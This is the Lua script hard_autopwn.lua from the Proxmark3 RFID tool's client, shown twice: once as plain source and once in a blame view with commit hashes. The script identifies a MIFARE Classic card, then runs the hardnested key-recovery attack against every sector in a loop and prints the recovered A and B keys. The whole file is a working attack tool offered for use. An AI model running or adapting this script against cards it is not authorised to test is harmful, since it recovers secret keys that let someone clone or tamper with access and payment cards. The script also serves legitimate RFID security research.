[proxmark3-svn] / client / scripts / hard_autopwn.lua

local cmds = require('commands')
local getopt = require('getopt')
local utils = require('utils')
local lib14a = require('read14a')

example = "script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys."
author = "Iceman"
desc =
[[
This script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys.

Arguments:
	-k 		Known key, 6 bytes (12 hex digits)
	-a		key A
	-b		key B
	-s 		Blocknumber for known key
Examples : 
	script hard -k 112233445566
]]

local numBlocks = 64
local numSectors = 16
local DEBUG = TRUE
--- 
-- A debug printout-function
function dbg(args)
	if not DEBUG then return end
	
    if type(args) == "table" then
		local i = 1
		while result[i] do
			dbg(result[i])
			i = i+1
		end
	else
		print("###", args)
	end	
end	
--- 
-- This is only meant to be used when errors occur
function oops(err)
	print("ERROR: ",err)
	return nil,err
end
--- 
-- Usage help
function help()
	print(desc)
	print("Example usage")
	print(example)
end
--
-- Exit message
function ExitMsg(msg)
	print( string.rep('--',20) )
	print( string.rep('--',20) )
	print(msg)
	print()
end
-- A little helper to place an item first in the list
local function placeFirst(akey, list)
	akey  = akey:lower()
	if list[1] == akey then 
		-- Already at pole position
		return list
	end
	local result = {akey}
	--print(("Putting '%s' first"):format(akey))
	for i,v in ipairs(list) do
		if v ~= akey then 
			result[#result+1] = v
		end
	end
	return result
end
-- A function to display the results
-- TODO: iceman 2016,  still screws up output when a key is not found.
local function displayresults(results)
	local sector, blockNo, keyA, keyB, succA, succB, _

	print("|---|----------------|---|----------------|---|")
	print("|sec|key A           |res|key B           |res|")
	print("|---|----------------|---|----------------|---|")

	for sector,_ in pairs(results) do
		succA, succB, keyA, keyB = unpack(_)
		print(("|%03d|  %s  | %s |  %s  | %s |"):format(sector, keyA, succA, keyB, succB))
	end
	print("|---|----------------|---|----------------|---|")

end

--[[
The mifare Classic 1k card has 16 sectors of 4 data blocks each. 
The first 32 sectors of a mifare Classic 4k card consists of 4 data blocks and the remaining
8 sectors consist of 16 data blocks. 
--]]
local function GetTargetBlockNo(sector)
	local trgblockno = sector * 4 - 1 
	if sector > 32 then
		trgblockno = 32 * 4 + (sector-32) * 16 -1
	end
	return ("%02x"):format(trgblockno)
end

--- 
-- The main entry point
function main(args)

	local blockno = '00'
	local keytype
	local key = 'fc00018778f7'
	local trgkey = ''
	local numSectors = 16 	
	
	-- Read the parameters
	for o, a in getopt.getopt(args, 'hk:abs:') do
		if o == "h" then return help() end
		if o == "k" then key = a end
		if o == "a" then keytype = '0' end
		if o == "b" then keytype = '1' end
		if o == "s" then blockno = a end
	end

	keytype = keytype or '0'
	
	-- Turn off Debug
	local cmdSetDbgOff = "hf mf dbg 0"
	core.console( cmdSetDbgOff) 
	core.clearCommandBuffer()
	-- identify tag
	result, err = lib14a.read1443a(false)
	if not result then return oops(err) end

	-- Show tag info
	print((' Found tag %s'):format(result.name))
	
	if 0x18 == result.sak then --NXP MIFARE Classic 4k | Plus 4k
		-- IFARE Classic 4K offers 4096 bytes split into forty sectors, 
		-- of which 32 are same size as in the 1K with eight more that are quadruple size sectors. 
		numSectors = 40
	elseif 0x08 == result.sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
		-- 1K offers 1024 bytes of data storage, split into 16 sector
		numSectors = 16
	elseif 0x09 == result.sak then -- NXP MIFARE Mini 0.3k
		-- MIFARE Classic mini offers 320 bytes split into five sectors.
		numSectors = 5
	elseif  0x10 == result.sak then-- "NXP MIFARE Plus 2k"
		numSectors = 32
	else
		print("I don't know how many sectors there are on this type of card, defaulting to 16")
	end

	result = {}
	for sector=1,numSectors do
		
		local trgblockno = GetTargetBlockNo(sector)
		local succA = 1
		local succB = 1
		local keyA = ''
		local keyB = ''
		
		for targetkeytype=0,1 do
			
			-- skip first sector, KeyA...  
			-- or actually blockNo and keytype
			-- just try default for now
			if sector == 1 and targetkeytype == 0 then
				keyA = utils.ConvertHexToAscii(key)
			else
				local err, foundkey = core.hardnested(blockno, keytype, key, trgblockno, tostring(targetkeytype), trgkey, 0,0,0,0)
				foundkey = foundkey or ""
				
				if targetkeytype == 0 then
					if err == nil or err > 0 then succA = 0 else keyA = foundkey end
				else
					if err == nil or err > 0 then succB = 0 else keyB = foundkey end
				end
			end

			-- clearing BigBuff between hardnested executions seems to make it more stable.
			core.clearCommandBuffer()
			core.console('data buffclear')
		end
		-- Check if user aborted
		if core.ukbhit() then
			print("Aborted by user")
			break
		end
		-- log
		result[sector] = { succA, succB, utils.ConvertAsciiToHex(keyA), utils.ConvertAsciiToHex(keyB) }
	end
	displayresults(result)
end

main(args)
Commit	Line	Data
b946d5f7	1	local cmds = require('commands')
	2	local getopt = require('getopt')
	3	local utils = require('utils')
	4	local lib14a = require('read14a')
	5
	6	example = "script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys."
	7	author = "Iceman"
	8	desc =
	9	[[
	10	This script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys.
	11
	12	Arguments:
	13	-k Known key, 6 bytes (12 hex digits)
	14	-a key A
	15	-b key B
	16	-s Blocknumber for known key
	17	Examples :
	18	script hard -k 112233445566
	19	]]
	20
	21	local numBlocks = 64
	22	local numSectors = 16
	23	local DEBUG = TRUE
	24	---
	25	-- A debug printout-function
	26	function dbg(args)
	27	if not DEBUG then return end
	28
	29	if type(args) == "table" then
	30	local i = 1
	31	while result[i] do
	32	dbg(result[i])
	33	i = i+1
	34	end
	35	else
	36	print("###", args)
	37	end
	38	end
	39	---
	40	-- This is only meant to be used when errors occur
	41	function oops(err)
	42	print("ERROR: ",err)
	43	return nil,err
	44	end
	45	---
	46	-- Usage help
	47	function help()
	48	print(desc)
	49	print("Example usage")
	50	print(example)
	51	end
	52	--
	53	-- Exit message
	54	function ExitMsg(msg)
	55	print( string.rep('--',20) )
	56	print( string.rep('--',20) )
	57	print(msg)
	58	print()
	59	end
	60	-- A little helper to place an item first in the list
	61	local function placeFirst(akey, list)
	62	akey = akey:lower()
	63	if list[1] == akey then
	64	-- Already at pole position
65	return list
66	end
67	local result = {akey}
68	--print(("Putting '%s' first"):format(akey))
69	for i,v in ipairs(list) do
70	if v ~= akey then
71	result[#result+1] = v
72	end
73	end
74	return result
75	end
76	-- A function to display the results
77	-- TODO: iceman 2016, still screws up output when a key is not found.
78	local function displayresults(results)
79	local sector, blockNo, keyA, keyB, succA, succB, _
80
81	print("\|---\|----------------\|---\|----------------\|---\|")
82	print("\|sec\|key A \|res\|key B \|res\|")
83	print("\|---\|----------------\|---\|----------------\|---\|")
84
85	for sector,_ in pairs(results) do
86	succA, succB, keyA, keyB = unpack(_)
87	print(("\|%03d\| %s \| %s \| %s \| %s \|"):format(sector, keyA, succA, keyB, succB))
88	end
89	print("\|---\|----------------\|---\|----------------\|---\|")
90
91	end
92
93	--[[
94	The mifare Classic 1k card has 16 sectors of 4 data blocks each.
95	The first 32 sectors of a mifare Classic 4k card consists of 4 data blocks and the remaining
96	8 sectors consist of 16 data blocks.
97	--]]
98	local function GetTargetBlockNo(sector)
99	local trgblockno = sector * 4 - 1
100	if sector > 32 then
101	trgblockno = 32 * 4 + (sector-32) * 16 -1
102	end
103	return ("%02x"):format(trgblockno)
104	end
105
106	---
107	-- The main entry point
108	function main(args)
109
110	local blockno = '00'
111	local keytype
112	local key = 'fc00018778f7'
113	local trgkey = ''
114	local numSectors = 16
115
116	-- Read the parameters
117	for o, a in getopt.getopt(args, 'hk:abs:') do
118	if o == "h" then return help() end
119	if o == "k" then key = a end
120	if o == "a" then keytype = '0' end
121	if o == "b" then keytype = '1' end
122	if o == "s" then blockno = a end
123	end
124
125	keytype = keytype or '0'
126
127	-- Turn off Debug
128	local cmdSetDbgOff = "hf mf dbg 0"
129	core.console( cmdSetDbgOff)
e069d740	130	core.clearCommandBuffer()
b946d5f7	131	-- identify tag
b946d5f7	132	result, err = lib14a.read1443a(false)
e069d740	133	if not result then return oops(err) end
e069d740	134
b946d5f7	135	-- Show tag info
	136	print((' Found tag %s'):format(result.name))
	137
	138	if 0x18 == result.sak then --NXP MIFARE Classic 4k \| Plus 4k
	139	-- IFARE Classic 4K offers 4096 bytes split into forty sectors,
	140	-- of which 32 are same size as in the 1K with eight more that are quadruple size sectors.
	141	numSectors = 40
	142	elseif 0x08 == result.sak then -- NXP MIFARE CLASSIC 1k \| Plus 2k
	143	-- 1K offers 1024 bytes of data storage, split into 16 sector
	144	numSectors = 16
	145	elseif 0x09 == result.sak then -- NXP MIFARE Mini 0.3k
	146	-- MIFARE Classic mini offers 320 bytes split into five sectors.
	147	numSectors = 5
	148	elseif 0x10 == result.sak then-- "NXP MIFARE Plus 2k"
	149	numSectors = 32
	150	else
	151	print("I don't know how many sectors there are on this type of card, defaulting to 16")
	152	end
	153
	154	result = {}
	155	for sector=1,numSectors do
	156
	157	local trgblockno = GetTargetBlockNo(sector)
	158	local succA = 1
	159	local succB = 1
	160	local keyA = ''
	161	local keyB = ''
	162
	163	for targetkeytype=0,1 do
	164
	165	-- skip first sector, KeyA...
	166	-- or actually blockNo and keytype
	167	-- just try default for now
	168	if sector == 1 and targetkeytype == 0 then
e069d740	169	keyA = utils.ConvertHexToAscii(key)
b946d5f7	170	else
	171	local err, foundkey = core.hardnested(blockno, keytype, key, trgblockno, tostring(targetkeytype), trgkey, 0,0,0,0)
	172	foundkey = foundkey or ""
	173
	174	if targetkeytype == 0 then
	175	if err == nil or err > 0 then succA = 0 else keyA = foundkey end
	176	else
	177	if err == nil or err > 0 then succB = 0 else keyB = foundkey end
	178	end
	179	end
	180
	181	-- clearing BigBuff between hardnested executions seems to make it more stable.
	182	core.clearCommandBuffer()
	183	core.console('data buffclear')
	184	end
	185	-- Check if user aborted
	186	if core.ukbhit() then
	187	print("Aborted by user")
	188	break
	189	end
	190	-- log
	191	result[sector] = { succA, succB, utils.ConvertAsciiToHex(keyA), utils.ConvertAsciiToHex(keyB) }
	192	end
	193	displayresults(result)
	194	end
	195
	196	main(args)